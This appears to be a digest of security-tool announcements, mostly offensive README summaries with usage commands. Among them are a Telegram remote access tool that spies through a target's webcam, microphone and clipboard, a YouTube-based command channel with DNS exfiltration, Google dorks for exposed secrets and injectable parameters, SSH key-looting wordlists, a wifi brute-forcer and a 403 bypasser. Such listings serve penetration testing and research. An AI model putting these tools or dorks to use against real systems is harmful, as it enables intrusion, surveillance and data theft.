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Dorkish - Chrome Extension Tool For OSINT & Recon

By: Zion3R

During reconaissance phase or when doing OSINT , we often use google dorking and shodan and thus the idea of Dorkish.
Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient reconnaissance and OSINT engagement.

Installation And Setup

1- Clone the repository

git clone

2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
3- click on Load unpacked extension button and select the dorkish folder.

Note: For firefox users , you can find the extension here :


Google dorking

  • Builder with keywords to filter your google search results.
  • Prebuilt dorks for Bug bounty programs.
  • Prebuilt dorks used during the reconnaissance phase in bug bounty.
  • Prebuilt dorks for exposed files and directories
  • Prebuilt dorks for logins and sign up portals
  • Prebuilt dorks for cyber secruity jobs

Shodan dorking

  • Builder with filter keywords used in shodan.
  • Varierty of prebuilt dorks to find IOT , Network infrastructure , cameras , ICS , databases , etc.


Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.


  • Add more useful dorks and catogories
  • Fix some bugs
  • Add a search bar to search through the results
  • Might add some LLM models to build dorks


I have built some dorks and I have used some public resources to gather the dorks , here's few : - -


  • I am not responsible for any damage caused by using the tool

Faraday 5.2.0

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Pyradm - Python Remote Administration Tool Via Telegram

By: Zion3R

Remote administration crossplatfrom tool via telegram\ Coded with ❀️ python3 + aiogram3\


  • [X] Screenshot from target
  • [X] Crossplatform
  • [X] Upload/Download
  • [X] Fully compatible shell
  • [X] Process list
  • [X] Webcam (video record or screenshot)
  • [X] Geolocation
  • [X] Filemanager
  • [X] Microphone
  • [X] Clipboard (text, image)


/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager
/fm /home or /fm C:\
/mic 10 - record audio from mic
/clip - get clipboard data
Press button to download file
Send any file as file for upload to target


  • git clone
  • cd pyradm
  • pip3 install -r requirements.txt
  • Put bot token to, ask @Bothfather
  • python3


  • Put bot token to
  • pip install nuitka
  • nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe


Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting

By: Zion3R

A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting

Live Tool

Broad domain search w/ negative search -www -shop -share -ir -mfa

PHP extension w/ parameters ext:php inurl:?

Disclosed XSS and Open Redirects inurl:reports intext:""

Juicy Extensions

site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess

XSS prone parameters

inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&

Open Redirect prone parameters

inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http

SQLi Prone Parameters

inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:&

SSRF Prone Parameters

inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:&

LFI Prone Parameters

inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:&

RCE Prone Parameters

inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:&

High % inurl keywords

inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com

Sensitive Parameters

inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com

API Docs

inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com"

Code Leaks "" "" "" ""

Cloud Storage "" "" "" "" "example[.]com" "example[.]com" "example[.]com" "example[.]com" "example[.]com" "example[.]com" "example[.]com" "example[.]com" inurl:"/d/" "example[.]com"

JFrog Artifactory "example[.]com"

Firebase "example[.]com"

File upload endpoints "choose file"

Dorks that work better w/o domain

Bug Bounty programs and Vulnerability Disclosure Programs

"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"

site:*/security.txt "bounty"

Apache Server Status Exposed

site:*/server-status apache




intext:"Powered by" & intext:Drupal & inurl:user



Medium articles for more dorks:

Top Parameters:

Proviesec dorks:

Fabric AI Integration Tool

fabric is an open-source framework for augmenting humans using AI. This does not have an official release yet but should be interesting to our readers.

DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes

By: Zion3R

DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.


Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.

Environment Setup

  1. Clone the Repository

First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:

git clone cd DarkGPT

  1. Configure Environment Variables

You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:


  1. Install Dependencies

This project requires certain Python packages to run. Install them by running the following command:

pip install -r requirements.txt 4. Then Run the project: python3

Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems

By: Zion3R

GTFOcli it's a Command Line Interface for easy binaries search commands that can be used to bypass local security restrictions in misconfigured systems.


Using go:

go install

Using homebrew:

brew tap cmd-tools/homebrew-tap
brew install gtfocli

Using docker:

docker pull cmdtoolsowner/gtfocli


Search for unix binaries

Search for binary tar:

gtfocli search tar

Search for binary tar from stdin:

echo "tar" | gtfocli search

Search for binaries located into file;

cat myBinaryList.txt

gtfocli search -f myBinaryList.txt

Search for windows binaries

Search for binary Winget.exe:

gtfocli search Winget --os windows

Search for binary Winget from stdin:

echo "Winget" | gtfocli search --os windows

Search for binaries located into file:

cat windowsExecutableList.txt

gtfocli search -f windowsExecutableList.txt --os windows

Search for binary Winget and print output in yaml format (see -h for available formats):

gtfocli search Winget -o yaml --os windows

Search using dockerized solution


Search for binary Winget and print output in yaml format:

docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows

Search for binary tar and print output in json format:

echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json

Search for binaries located into file mounted as volume in the container:

cat myBinaryList.txt

docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt


An example of common use case for gtfocli is together with find:

find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null


find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search


Thanks to GTFOBins and LOLBAS, without these projects gtfocli would never have come to light.


You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.

Lynis Auditing Tool 3.1.0

Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes. This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems.

OpenSSH 9.7p1

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

n0Mac - Yet Another Mac Changer!!!

By: Zion3R

This script changes the MAC address of the network interface to a randomly generated address on system startup using crontab. It then uses the macchanger command to generate a list of MAC address vendors and selects one at random and then combines that vendor prefix with a randomly generated suffix to create the new MAC address.

Note: This tool is intended for educational purposes only. It is not intended for any malicious activities or any other illegal activities. By using this tool, you agree to the terms and conditions set forth in the disclaimer and accept full responsibility for any misuse of the tool. The author of this tool is not liable for any damages or losses resulting from the use or misuse of this tool by anyone.

  • chmod +x
  • ./

  • chmod +x
  • ./

Some-Tweak-To-Hide-Jwt-Payload-Values - A Handful Of Tweaks And Ideas To Safeguard The JWT Payload

By: Zion3R

  • a handful of tweaks and ideas to safeguard the JWT payload, making it futile to attempt decoding by constantly altering its value,
    ensuring the decoded output remains unintelligible while imposing minimal performance overhead.

What is a JWT Token?

A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It's a standard, defined in RFC 7519. The token is a long string, divided into parts separated by dots. Each part is base64 URL-encoded.

What parts the token has depends on the type of the JWT: whether it's a JWS (a signed token) or a JWE (an encrypted token). If the token is signed it will have three sections: the header, the payload, and the signature. If the token is encrypted it will consist of five parts: the header, the encrypted key, the initialization vector, the ciphertext (payload), and the authentication tag. Probably the most common use case for JWTs is to utilize them as access tokens and ID tokens in OAuth and OpenID Connect flows, but they can serve different purposes as well.

Primary Objective of this Code Snippet

This code snippet offers a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens, where the stored keys are visible in plaintext. This code snippet provides a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens. Typically, the payload section appears in plaintext when decoded from the JWT token (base64). The main objective is to lightly encrypt or obfuscate the payload values, making it difficult to discern their meaning. The intention is to ensure that even if someone attempts to decode the payload values, they cannot do so easily.

  • The code snippet targets the key named "userid" stored in the payload section as an example.
  • The choice of "userid" stems from its frequent use for user identification or authentication purposes after validating the token's validity (e.g., ensuring it has not expired).

The idea behind attempting to obscure the value of the key named "userid" is as follows:

  • The timestamp is hashed and then encrypted by performing bitwise XOR operation with the user ID.
  • XOR operation is performed using a symmetric key.
  • The resulting value is then encoded using Base64.

  • Encrypted data is decoded using Base64.
  • Decryption is performed by XOR operation with the symmetric key.
  • The original user ID and hashed timestamp are revealed in plaintext.
  • The user ID part is extracted by splitting at the "|" delimiter for relevant use and purposes.

Symmetric Key for XOR Encoding:
  • Various materials can be utilized for this key.
  • It could be a salt used in conventional password hashing, an arbitrary random string, a generated UUID, or any other suitable material.
  • However, this key should be securely stored in the database management system (DBMS).


in the example, the key is shown as { 'userid': 'random_value' },
making it apparent that it represents a user ID.

However, this is merely for illustrative purposes.

In practice, a predetermined and undisclosed name is typically used.
For example, 'a': 'changing_random_value'

  • This code snippet is created for educational purposes and serves as a starting point for ideas rather than being inherently secure.
  • It provides a level of security beyond plaintext visibility but does not guarantee absolute safety.

Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.

  • If you find this helpful, please the "star":star2: to support further improvements.

# python3

- Current Unix Timestamp: 1709160368
- Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08

- userid: 23243232
- XOR Symmetric key: b'generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms'
- JWT Secret key: yes_your_service_jwt_secret_key

- Encoded UserID and Timestamp: VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo=
- Decoded UserID and Hashed Timestamp: 23243232|e27436b7393eb6c2fb4d5e2a508a9c5c

- Decoded JWT: {'timestamp': '2024-02-29 07:46:08', 'userid': 'VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo='}

# run again
- Decoded JWT: {'timestamp': '2024-02-29 08:16:36', 'userid': 'VVZcUUFTX14FaRNAVBRpRQcORmtWRGl eVUtRZlYXaBZZCgYOWGlDR10='}
- Decoded JWT: {'timestamp': '2024-02-29 08:16:51', 'userid': 'VVZcUUFTX14FZxMRVUdnEgJZEmxfRztRVUBabAsRZkdVVlJWWztGQVA='}
- Decoded JWT: {'timestamp': '2024-02-29 08:17:01', 'userid': 'VVZcUUFTX14FbxYQUkM8RVRZEmkLRWsNUBYNb1sQPREFDFYKDmYRQV4='}
- Decoded JWT: {'timestamp': '2024-02-29 08:17:09', 'userid': 'VVZcUUFTX14FbUNEVEVqEFlaTGoKQjxZBRULOlpGPUtSClALWD5GRAs='}

SSH-Private-Key-Looting-Wordlists - A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names

By: Zion3R

SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.

LFI for Lateral Movement? Gain SSH Access?

SSH Private Key Looting Wordlists πŸ”’πŸ—οΈ

This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.

Wordlist Files πŸ“
  • ssh-priv-key-loot-common.txt: Default and common naming conventions for SSH private key files.
  • ssh-priv-key-loot-medium.txt: Probable file names without backup file extensions.
  • ssh-priv-key-loot-extended.txt: Probable file names with backup file extensions.
  • ssh-priv-key-loot-*_w_gui.txt: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.

Usage πŸš€

These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other bruteforcing tool that supports custom wordlists. They can help expand the scope of your brute-forcing or enumeration efforts when targeting SSH private key files.

Acknowledgements πŸ™

This wordlist repository was inspired by John Hammond in his vlog "Don't Forget This One Hacking Trick."

Disclaimer ⚠️

Please use these wordlists responsibly and only on systems you are authorized to test. Unauthorized use is illegal.

Nomore403 - Tool To Bypass 403/40X Response Codes

By: Zion3R

nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.


Before you install and run nomore403, make sure you have the following: - Go 1.15 or higher installed on your machine.


From Releases

Grab the latest release for your OS from our Releases page.

Compile from Source

If you prefer to compile the tool yourself:

git clone
cd nomore403
go get
go build


To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.


Output example
    ________  ________  ________  ________  ________  ________  ________  ________  ________
β•± β•± β•²β•± β•²β•± β•± β•²β•± β•²β•± β•²β•± β•²β•± β•± β•²β•± β•²β•±__ β•²
β•± β•± β•± β•± β•± β•± β•± β•± β•± __β•± β•± β•± β•±__ β•±
β•± β•± β•± β•± β•± _β•± __/____ β•± β•± β•±
β•²__β•±_____β•±β•²________β•±β•²__β•±__β•±__β•±β•²________β•±β•²____β•±___β•±β•²________β•± β•±____β•±β•²________β•±β•²________β•±

Headers: false
Proxy: false
User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)
Method: GET
Payloads folder: payloads
Custom bypass IP: false
Follow Redirects: false
Rate Limit detection: false
Verbose: false

━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━
403 429 bytes

━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━

━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━
200 2047 bytes;///..admin

━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━
403 429 bytes HTTP/1.0
403 429 bytes HTTP/1.1
403 429 bytes HTTP/2

━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━
200 2047 bytes

Basic Usage
./nomore403 -u

Verbose Mode + Proxy
./nomore403 -u -x -v

Parse request from Burp
./nomore403 --request-file request.txt

Use custom header + specific IP address for bypasses
./nomore403 -u -H "Environment: Staging" -b

Set new max of goroutines + add delay between requests
./nomore403 -u -m 10 -d 200

./nomore403 -h
Command line application that automates different ways to bypass 40X codes.

nomore403 [flags]

-i, --bypass-ip string Use a specified IP address or hostname for bypassing access controls. Injects this IP in headers like 'X-Forwarded-For'.
-d, --delay int Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms).
-f, --folder string Specify the folder location for payloads if not in the same directory as the executable.
-H, --header strings Add one or more custom headers to requests. Repeatable flag for multiple headers.
-h, --help help for nomore403
--http Use HTTP instead of HTTPS for requests defined in the request file.
-t, --http-method string Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'.
-m, --max-goroutines int Limit the maximum number of concurrent goroutines to manage load (default: 50). (default 50)
--no-banner Disable the display of the startup banner (default: banner shown).
-x, --proxy string Specify a proxy server for requests, e.g., 'http://server:port'.
--random-agent Enable the use of a randomly selected User-Agent.
-l, --rate-limit Halt requests upon encountering a 429 (rate limit) HTTP status code.
-r, --redirect Automatically follow redirects in responses.
--request-file string Load request configuration and flags from a specified file.
-u, --uri string Specify the target URL for the request.
-a, --user-agent string pecify a custom User-Agent string for requests (default: 'nomore403').
-v, --verbose Enable verbose output for detailed request/response logging.


We welcome contributions of all forms. Here's how you can help:

  • Report bugs and suggest features.
  • Submit pull requests with bug fixes and new features.

Security Considerations

While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.


nomore403 is released under the MIT License. See the LICENSE file for details.


Tool to bypass 403/40X response codes. (3)

GNU Privacy Guard 2.4.5

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions.

WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies

By: Zion3R

WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.


The packages are minimal or nearly none πŸ˜…. The package install command is:

pip install rich pyfiglet

Thats it.


So listing the features:

  • Overall Features:
  • We can use custom interfaces or non-default interfaces to run the attack.
  • Well-defined way of using netsh and listing and utilizing targets.
  • Upgradeability
  • Code-Wise Features:
  • Interactive menu-driven system with rich.
  • versatility in using interface, targets, and password files.

How it works

So this is how the bruteforcer works:

  • Provide Interface:

  • The user is required to provide the network interface for the tool to use.

  • By default, the interface is set to Wi-Fi.

  • Search and Set Target:

  • The user must search for and select the target network.

  • During this process, the tool performs the following sub-steps:

    • Disconnects all active network connections for the selected interface.
    • Searches for all available networks within range.
  • Input Password File:

  • The user inputs the path to the password file.

  • The default path for the password file is ./wordlist/default.txt.

  • Run the Attack:

  • With the target set and the password file ready, the tool is now prepared to initiate the attack.

  • Attack Procedure:

  • The attack involves iterating through each password in the provided file.
  • For each password, the following steps are taken:
    • A custom XML configuration for the connection attempt is generated and stored.
    • The tool attempts to connect to the target network using the generated XML and the current password.
    • To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
    • If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
    • This loop continues until a successful ping response is received, indicating a successful connection attempt.

How to run this

After installing all the packages just run python rest is history πŸ‘ make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:



For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.

SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube

By: Zion3R

SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.

The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos can use cleartext or AES-encrypted values.

It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a persistence method using only web requests to the Google API.


Run the listener in your Windows system:

It will check the Youtube channel every a specific amount of time (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder example-videos:

After finding there is a new video in the channel, it decodes the QR code from the video thumbnail, executes the command and the response is base64-encoded and exfiltrated using DNS:

This works also for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from example-videos is uploaded and the content of c:\temp is exfiltrated using several DNS queries:

Logging to a file is optional but you must check the folder for that file exists in the system, the default value is "c:\temp\.sharpcoverttube.log". DNS exfiltration is also optional and can be tested using Burp's collaborator:

As an alternative, I created this repository with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.


There are some values you can change, you can find them in Configuration.cs file for the regular binary and the service binary. Only the first two have to be updated:

  • channel_id (Mandatory!!!): Get your Youtube channel ID from here.
  • api_key (Mandatory!!!): To get the API key create an application and generate the key from here.
  • payload_aes_key (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-characters string.
  • payload_aes_iv (Optional. Default: "0000000000000000"): IV key for decrypting QR codes (if using AES). It must be a 16-characters string.
  • seconds_delay (Optional. Default: 600): Seconds of delay until checking if a new video has been uploaded. If the value is low you will exceed the API rate limit.
  • debug_console (Optional. Default: true): Show debug messages in console or not.
  • log_to_file (Optional. Default: true): Write debug messages in log file or not.
  • log_file (Optional. Default: "c:\temp\.sharpcoverttube.log"): Log file path.
  • dns_exfiltration (Optional. Default: true): Exfiltrate command responses through DNS or not.
  • dns_hostname (Optional. Default: ""): DNS hostname to exfiltrate the response from commands executed in the system.

Generating videos with QR codes

You can generate the videos from Windows using Python3. For that, first install the dependencies:

pip install Pillow opencv-python pyqrcode pypng pycryptodome rebus

Then run the script:

python -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]
  • TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.

  • FILE (-f) is the path where the video is generated.

  • COMMAND (-c) is the command to execute in the system.

  • AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.

  • AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.


Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:

python -t qr -f c:\temp\whoami.avi -c whoami

Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:

python -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000

Running it as a service

You can find the code to run it as a service in the SharpCovertTube_Service folder. It has the same functionalities except self-deletion, which would not make sense in this case.

It possible to install it with InstallUtil, it is prepared to run as the SYSTEM user and you need to install it as administrator:

InstallUtil.exe SharpCovertTube_Service.exe

You can then start it with:

net start "SharpCovertTube Service"

In case you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges you can not install services so you can only use the ordinary binary.

  • File must be 64 bits!!! This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's QR-Capture project, who borrowed part of it from Uzi Granot's QRCode project, who at the same time borrowed part of it from Zakhar Semenov's Camera_Net project (then I lost track). So thanks to all of them!

  • This project is a port from covert-tube, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about Casbaneiro and Numando malwares.

Mhf - Mobile Helper Framework - A Tool That Automates The Process Of Identifying The Framework/Technology Used To Create A Mobile Application

By: Zion3R

Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding sensitive information or provides suggestions for working with the identified platform.

How work?

The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.



Search files:


React Native Android & iOS

Search file

Andorid files:

iOS files:



❗A minimum of Java 8 is required to run Apktool.

pip install -r requirements.txt


python3 app.apk|ipa|aab

python3 file.apk

[+] App was written in React Native

Do you want analizy the application (y/n) y

Output directory already exists. Skipping decompilation.

Beauty the react code? (y/n) n

Search any info? (y/n) y

==>>Searching possible internal IPs in the file


==>>Searching possible emails in the file


==>>Searching possible interesting words in the file


==>>Searching Private Keys in the file


==>>Searching high confidential secrets


==>>Searching possible sensitive URLs in js files


==>>Searching possible endpoints in js files results.........


This tool uses Apktool for decompilation of Android applications.

This tool renames the .ipa file of iOS applications to .zip and extracts the contents.

Feature Note Cordova React Native Native JavaScript Flutter Xamarin
JavaScript beautifier Use this for the first few occasions to see better results. βœ… βœ… βœ…
Identifying multiple sensitive information IPs, Private Keys, API Keys, Emails, URLs βœ… βœ… βœ… ❌
Cryptographic Functions βœ… βœ… βœ… ❌ ❌
Endpoint extractor βœ… βœ… βœ… ❌ ❌
Automatically detects if the code has been beautified. ❌ ❌ ❌
Extracts automatically apk of devices/emulator ❌ ❌ ❌ ❌ ❌
Patching apk βœ…
Extract an APK from a bundle file. βœ… βœ… βœ… βœ… βœ…
Detect if JS files are encrypted ❌ ❌
Detect if the resources are compressed. ❌ Hermesβœ… ❌ ❌ XALZβœ…
Detect if the app is split ❌ ❌ ❌ ❌ ❌

What is patching apk: This tool uses Reflutter, a framework that assists with reverse engineering of Flutter apps using a patched version of the Flutter library.

More information:

Split APKs is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.

Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.

adb shell pm path com.package

For example, in Flutter if the application is a Split it's necessary patch split_config.arm64_v8a.apk, this file contains

  • This tool use a secrets-patterns-db repositorty created by mazen160
  • This tool use a regular expresion created by Gerben_Javado for extract endpoints
  • This tools use reflutter for flutter actions


  • Public release
  • Bug fixes

  • Added plugins information in Cordova apps
  • Added Xamarin actions
  • Added NativeScript actions
  • Bug fixes

  • Added NativeScript app detection
  • Added signing option when the apk extracted of aab file is not signed

  • Fixed issues with commands on Linux.

  • Initial version release.

  • This work is licensed under a Creative Commons Attribution 4.0 International License.


Cesar Calderon Marco Almaguer

BloodHound - Six Degrees Of Domain Admin

By: Zion3R

BloodHound is a monolithic web application composed of an embedded React frontend with Sigma.js and a Go based REST API backend. It is deployed with a Postgresql application database and a Neo4j graph database, and is fed by the SharpHound and AzureHound data collectors.

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.

BloodHound CE is created and maintained by the BloodHound Enterprise Team. The original BloodHound was created by @_wald0, @CptJesus, and @harmj0y.

Running BloodHound Community Edition

The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.

  1. Install Docker Compose and ensure Docker is running. This should be included with the Docker Desktop installation
  2. Run curl -L | docker compose -f - up
  3. Locate the randomly generated password in the terminal output of Docker Compose
  4. In a browser, navigate to http://localhost:8080/ui/login. Login with a username of admin and the randomly generated password from the logs

NOTE: going forward, the default docker-compose.yml example binds only to localhost ( If you want to access BloodHound outside of localhost, you'll need to follow the instructions in examples/docker-compose/ to configure the host binding for the container.

Installation Error Handling
  • If you encounter a "failed to get console mode for stdin: The handle is invalid." ensure Docker Desktop (and associated Engine is running). Docker Desktop does not automatically register as a startup entry.

  • If you encounter an "Error response from daemon: Ports are not available: exposing port TCP -> listen tcp bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. Please stop or delete the service to continue.
# Verify if Docker Engine is Running
docker info

# Attempt to stop Neo4j Service if running (on Windows)
Stop-Service "Neo4j" -ErrorAction SilentlyContinue
  • A successful installation of BloodHound CE would look like the below:

Useful Links


Please check out the Contact page in our wiki for details on how to reach out with questions and suggestions.

Tinyfilemanager-Wh1Z-Edition - Effortlessly Browse And Manage Your Files With Ease Using Tiny File Manager [WH1Z-Edition], A Compact Single-File PHP File Manager

By: Zion3R

Introducing Tiny File Manager [WH1Z-Edition], the compact and efficient solution for managing your files and folders with enhanced privacy and security features. Gone are the days of relying on external resources – I've stripped down the code to its core, making it truly lightweight and perfect for deployment in environments without internet access or outbound connections.

Designed for simplicity and speed, Tiny File Manager [WH1Z-Edition] retains all the essential functionalities you need for storing, uploading, editing, and managing your files directly from your web browser. With a single-file PHP setup, you can effortlessly drop it into any folder on your server and start organizing your files immediately.

What sets Tiny File Manager [WH1Z-Edition] apart is its focus on privacy and security. By removing the reliance on external domains for CSS and JS resources, your data stays localized and protected from potential vulnerabilities or leaks. This makes it an ideal choice for scenarios where data integrity and confidentiality are paramount, including RED TEAMING exercises or restricted server environments.

  • PHP 5.5.0 or higher.
  • Fileinfo, iconv, zip, tar and mbstring extensions are strongly recommended.

How to use

Download ZIP with latest version from master branch.

Simply transfer the "tinyfilemanager-wh1z.php" file to your web hosting space – it's as easy as that! Feel free to rename the file to whatever suits your needs best.

The default credentials are as follows: admin/WH1Z@1337 and user/WH1Z123.

:warning: Caution: Before use, it is imperative to establish your own username and password within the $auth_users variable. Passwords are encrypted using password_hash().

ℹ️ You can generate a new password hash accordingly: Login as Admin -> Click Admin -> Help -> Generate new password hash

:warning: Caution: Use the built-in password generator for your privacy and security. πŸ˜‰

To enable/disable authentication set $use_auth to true or false.

:loudspeaker: Key Features
  • :cd: Open Source, lightweight, and incredibly user-friendly
  • :iphone: Optimized for mobile devices, ensuring a seamless touch experience
  • :information_source: Core functionalities including file creation, deletion, modification, viewing, downloading, copying, and moving
  • :arrow_double_up: Efficient Ajax Upload functionality, supporting drag & drop, URL uploads, and multiple file uploads with file extension filtering
  • :file_folder: Intuitive options for creating both folders and files
  • :gift: Capability to compress and extract files (zip, tar)
  • :sunglasses: Flexible user permissions system, based on session and user root folder mapping
